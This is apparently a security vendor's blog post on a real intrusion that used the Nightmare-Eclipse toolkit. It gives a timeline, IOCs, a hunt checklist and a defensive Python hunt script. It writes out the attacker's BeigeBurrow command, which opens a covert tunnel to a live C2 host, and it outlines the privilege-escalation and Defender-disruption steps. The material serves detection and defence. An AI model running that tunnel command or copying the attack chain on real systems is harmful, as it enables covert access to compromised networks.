
Nightmare-Eclipse: Public PoC Meets Real Intrusion

Huntress caught the Nightmare-Eclipse toolkit (BlueHammer, RedSun, UnDefend, BeigeBurrow) in a live intrusion. Here are the IOCs and what we learned.

Nightmare-Eclipse toolkit illustration covering BlueHammer, RedSun, UnDefend and the BeigeBurrow reverse tunnel agent

On April 20, 2026, Huntress published an incident report describing a real intrusion in which a threat actor tried to weaponise a set of public proof-of-concept tools collectively known as Nightmare-Eclipse. The pattern is the one we keep seeing: a researcher releases PoC code for an unpatched local privilege escalation, and within days someone drops it onto a live endpoint.

The good news in this case: of the four tools dropped on the target, three failed. Windows Defender quarantined the BlueHammer binary, RedSun never produced a result, and the UnDefend variants were operated incorrectly. Only the BeigeBurrow reverse-tunnel agent actually connected outbound. This post summarises the intrusion, lists every indicator of compromise Huntress published, and gives you a short hunt-and-harden checklist you can act on today.

What happened

The intrusion spanned roughly a week of activity on a single victim environment. Huntress reconstructed the timeline from EDR telemetry, FortiGate SSL VPN logs, and Defender alerts.

| When | What Huntress observed |
|---|---|
| April 10 | FunnyApp.exe (a BlueHammer variant) executed from the user’s Pictures folder. Defender quarantined it as Exploit:Win32/DfndrPEBluHmr.BZ. |
| April 15, 13:44 UTC | SSL VPN logon to the victim’s FortiGate using compromised credentials, sourced from 78.29.48[.]29 (Russia). |
| April 16 | RedSun.exe executed from Downloads. Multiple UnDefend binaries (undef.exe, renamed z.exe) run from two different subfolders with and without the -aggressive flag. |
| April 16 | Hands-on-keyboard reconnaissance: whoami /priv, cmdkey /list, net group. One whoami /priv spawned from M365Copilot.exe, suggesting the operator pivoted through a hijacked Copilot process. |
| Follow-on | Additional VPN sessions from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland), same account, within a short window. |
| | BeigeBurrow agent.exe -server staybud.dpdns[.]org:443 -hide established an outbound Yamux tunnel to the attacker’s C2. |

Three of the four tools failed to deliver their intended outcome. Huntress specifically called out that “the adversary clearly did not read nor understand the mechanism of action for UnDefend,” which is a nice reminder that opportunistic actors often run PoCs straight from a README without checking whether the prerequisites match the target.

The toolkit

Nightmare-Eclipse is not a single piece of malware. It is a cluster of four separate tools originally released as public proof-of-concept code, each solving a different step in a Windows intrusion.

BlueHammer (CVE-2026-33825)

BlueHammer is a local privilege escalation exploit that targets a time-of-check to time-of-use race in Windows Defender. In the original PoC it is used to extract the SAM database by briefly pausing Defender and winning the race against its scanner. Microsoft issued CVE-2026-33825 and shipped the fix in the April 2026 cumulative update.

[Screenshot: MSRC advisory page for CVE-2026-33825, the Windows Defender TOCTOU vulnerability exploited by BlueHammer]

In this intrusion the BlueHammer binary was named FunnyApp.exe and dropped to the user’s Pictures folder. Defender caught it on execution and flagged it as Exploit:Win32/DfndrPEBluHmr.BZ. If you are patched, you are not vulnerable to the race, and Defender’s own signatures will detect the known public build on top of that.

RedSun

RedSun is a second privilege escalation that abuses directory junctions and the Windows Storage Tiers Management service to write arbitrary files into protected locations such as System32. There is no CVE assigned and no public patch at the time of the Huntress report. In this intrusion it was dropped as RedSun.exe in the user’s Downloads folder and run directly. Huntress did not observe a successful exploitation outcome on the target.

UnDefend

UnDefend is a Defender disruption tool rather than an exploit. It uses directory change notifications and file locks (oplocks) to hold Defender’s signature files open, preventing the product from loading or updating definitions. The operator tried both a bare execution and an aggressive-mode execution:

  • C:\Users\<username>\Downloads\ks\undef.exe
  • C:\Users\<username>\Downloads\kk\undef.exe -aggressive
  • C:\Users\<username>\Downloads\ks\z.exe (the same tool, renamed)

Note that the operator used two different subfolders (ks and kk) and the correctly spelled -aggressive flag. Huntress notes none of these invocations actually disrupted the target’s Defender.

BeigeBurrow

BeigeBurrow is the only tool in the set that ran successfully. It is a Go-compiled Windows binary that uses HashiCorp’s Yamux multiplexing library to build a covert, bidirectional TCP relay from the compromised host to an attacker-controlled server. Flags observed include -server, -hide, and -chain. The agent reconnects every five minutes if the tunnel drops.

In this intrusion the command line was:

agent.exe -server staybud.dpdns[.]org:443 -hide

The SHA-256 of the observed agent.exe sample is a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c. Huntress’s assessment is that BeigeBurrow “exists for one purpose: to give an operator a covert, multi-channel TCP relay into a compromised network.” The Huntress team also noted they cannot yet tell whether BeigeBurrow is being sold, shared between a loose group, or used uniquely by a single actor.

Attack chain

The end-to-end chain is straightforward once the VPN credentials are in the attacker’s hands.

```mermaid
graph TD
  A["Stolen VPN credentials<br/><small>FortiGate SSL VPN account</small>"] --> B["VPN logon from 78.29.48[.]29<br/><small>Russia, April 15 13:44 UTC</small>"]
  B --> C["Endpoint access<br/><small>Hands-on-keyboard recon</small>"]
  C --> D["LPE attempts<br/><small>BlueHammer, RedSun, UnDefend</small>"]
  D --> E["All three LPEs fail<br/><small>Defender quarantine + operator error</small>"]
  C --> F["BeigeBurrow agent.exe<br/><small>-server staybud.dpdns[.]org:443 -hide</small>"]
  F --> G["Yamux tunnel to C2<br/><small>Reconnects every 5 minutes</small>"]
  C --> H["Follow-on VPN logons<br/><small>212.232.23[.]69 SG, 179.43.140[.]214 CH</small>"]
  style A fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style B fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style C fill:#92400e,stroke:#78350f,color:#fef3c7
  style D fill:#92400e,stroke:#78350f,color:#fef3c7
  style E fill:#166534,stroke:#14532d,color:#dcfce7
  style F fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style G fill:#5b21b6,stroke:#4c1d95,color:#ede9fe
  style H fill:#5b21b6,stroke:#4c1d95,color:#ede9fe
```

The only control that genuinely worked was Defender’s signature-based detection of the public BlueHammer PoC. Every other defensive outcome in this case depended on the operator making a mistake. That is not a defensive posture; that is luck.

Indicators of Compromise

All values below are reproduced exactly as published by Huntress, including their defang style ([.] for IP and domain dots).

Network indicators

| Type | Value | Notes |
|---|---|---|
| IP (Russia) | 78.29.48[.]29 | Initial SSL VPN logon, April 15 |
| IP (Singapore) | 212.232.23[.]69 | Follow-on SSL VPN logon |
| IP (Switzerland) | 179.43.140[.]214 | Follow-on SSL VPN logon |
| Domain (C2) | staybud.dpdns[.]org | BeigeBurrow Yamux tunnel destination, port 443 |

Host indicators

| Type | Value | Tool |
|---|---|---|
| SHA-256 | a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c | BeigeBurrow agent.exe |
| Defender signature | Exploit:Win32/DfndrPEBluHmr.BZ | BlueHammer |
| File path | C:\Users\<username>\Pictures\FunnyApp.exe | BlueHammer |
| File path | C:\Users\<username>\Downloads\RedSun.exe | RedSun |
| File path | C:\Users\<username>\Downloads\ks\undef.exe | UnDefend |
| File path | C:\Users\<username>\Downloads\kk\undef.exe -aggressive | UnDefend (aggressive mode) |
| File path | C:\Users\<username>\Downloads\ks\z.exe | UnDefend (renamed binary) |
| Command line | agent.exe -server staybud.dpdns[.]org:443 -hide | BeigeBurrow |

What to hunt for

There are three things worth doing today, in order.

Patch and confirm Defender is current

  • Verify the April 2026 cumulative update is applied on every Windows endpoint. The MSRC advisory for CVE-2026-33825 is the authoritative reference for affected builds and patched versions.
  • Check Defender platform and engine versions on the fleet. Out-of-date Defender installs may not carry the Exploit:Win32/DfndrPEBluHmr.BZ signature.
  • For any endpoint that lags on either, prioritise remediation before moving on to hunting. A patched endpoint makes BlueHammer a non-issue.

Hunt the IOCs

  • Run EDR queries for the SHA-256 a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c across the fleet.
  • Search process telemetry for file names FunnyApp.exe, RedSun.exe, undef.exe, z.exe, and any agent.exe running with -server and -hide flags.
  • Search DNS and proxy logs for resolutions or connections to staybud.dpdns[.]org, and outbound TCP 443 sessions to that host.
  • Search Defender alert history for the Exploit:Win32/DfndrPEBluHmr.BZ detection.
  • Search FortiGate SSL VPN logs for successful authentications from 78.29.48[.]29, 212.232.23[.]69, or 179.43.140[.]214. Also flag any account that authenticated from more than one country within a short window, regardless of IP.
  • Look for unusual parent-child process relationships around whoami /priv, cmdkey /list, and net group, in particular anything spawned by M365Copilot.exe.
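The hunt steps above as one script, added here as an example and not Huntress code: it sweeps exported process events and FortiGate SSL VPN logons for the published indicators, the BeigeBurrow flag pattern, recon spawned from M365Copilot.exe, and accounts seen from more than one country in a short window. The record layouts, user names and sample events are constructed assumptions; adapt the field names to whatever your EDR and FortiGate exports actually use.

```python
# Added hunt example, not Huntress code. Record layouts and the sample events
# are constructed assumptions; the indicators are the report's values, refanged.
from datetime import datetime as dt, timedelta
IOC_SHA256 = {"a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c"}
IOC_IPS = {"78.29.48.29", "212.232.23.69", "179.43.140.214"}
IOC_NAMES = {"funnyapp.exe", "redsun.exe", "undef.exe", "z.exe"}
RECON = ("whoami /priv", "cmdkey /list", "net group")

def hunt_processes(events):
    """Return (reason, detail) pairs for process events matching the host IOCs."""
    hits = []
    for e in events:
        name = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"].lower()
        if e.get("sha256", "").lower() in IOC_SHA256:
            hits.append(("hash", e["image"]))
        elif name in IOC_NAMES:
            hits.append(("name", e["image"]))
        elif name == "agent.exe" and "-server" in cmd and "-hide" in cmd:
            hits.append(("beigeburrow_flags", e["cmdline"]))  # catches rebuilt agents
        elif cmd.startswith(RECON) and e["parent"].lower() == "m365copilot.exe":
            hits.append(("recon_odd_parent", e["cmdline"]))
    return hits

def hunt_vpn(logons, window=timedelta(hours=24)):
    """Flag logons from listed IPs and accounts seen from >1 country within `window`."""
    hits = [("ioc_ip", l["user"], l["ip"]) for l in logons if l["ip"] in IOC_IPS]
    by_user = {}
    for l in sorted(logons, key=lambda x: x["ts"]):
        by_user.setdefault(l["user"], []).append(l)
    for user, ls in by_user.items():
        for i, a in enumerate(ls):
            for b in ls[i + 1:]:
                if b["ts"] - a["ts"] <= window and a["country"] != b["country"]:
                    hits.append(("multi_country", user, a["country"] + "->" + b["country"]))
    return hits

# Constructed sample telemetry modelled on the timeline above.
PROCS = [
    {"image": r"C:\Users\jdoe\Pictures\FunnyApp.exe", "cmdline": "FunnyApp.exe", "parent": "explorer.exe"},
    {"image": r"C:\Users\jdoe\Downloads\agent.exe", "cmdline": "agent.exe -server staybud.dpdns.org:443 -hide",
     "parent": "cmd.exe", "sha256": "a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c"},
    {"image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /priv", "parent": "M365Copilot.exe"},
]
VPN = [
    {"user": "jdoe", "ip": "78.29.48.29", "country": "RU", "ts": dt(2026, 4, 15, 13, 44)},
    {"user": "jdoe", "ip": "212.232.23.69", "country": "SG", "ts": dt(2026, 4, 15, 18, 2)},
    {"user": "asmith", "ip": "203.0.113.7", "country": "GB", "ts": dt(2026, 4, 15, 9, 0)},
]
```

The multi-country check deliberately ignores the IP list, so it still fires when the same account is reused from an address that is not yet on any indicator feed.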

Harden the VPN

  • Enforce MFA on FortiGate SSL VPN for every account. If you cannot enforce it centrally, disable accounts that refuse to enrol.
  • Rotate credentials for any account that authenticated from the three listed IPs, or from any unusual geography in the last 30 days.
  • Review FortiGate logon audit and admin-action logs for configuration changes made during the incident window, including any new local users or modified firewall policies.
  • If you already use a managed EDR product, confirm that BeigeBurrow-style outbound tunnels on port 443 to dynamic DNS providers (.dpdns.org in this case) generate an alert. If they do not, add a detection for Go-compiled binaries making long-lived outbound connections from user-writable directories.

Why this matters for MSPs

The Nightmare-Eclipse cluster is a useful example of what we are going to see more of, not less of, over the coming year.

Public PoCs get weaponised in days. The BlueHammer, RedSun, and UnDefend PoCs were released in April 2026 and observed in a live intrusion within the same month. Any time a high-impact Windows LPE drops publicly, plan for weaponisation on a scale of days, not quarters.

Opportunistic operators are a real threat model. The actor in this case ran tools they clearly did not fully understand. That does not mean you can relax; it means the floor of capability required to attempt an intrusion is now very low. Decent detections and patching catch most of it; missing either is what gets exploited.

Covert tunnels are the only tool they actually need. BeigeBurrow was the one thing that worked. Small Go binaries talking Yamux over 443 to a dynamic DNS host are not exotic; they are table stakes for modern intrusions. If your EDR does not alert on this class of behaviour, that is the gap to close.

VPN credential theft remains the front door. The entire intrusion hinges on one stolen FortiGate SSL VPN credential. Enforcing MFA on every VPN account is a boring recommendation, and it is also the single control that would have prevented the chain from starting.
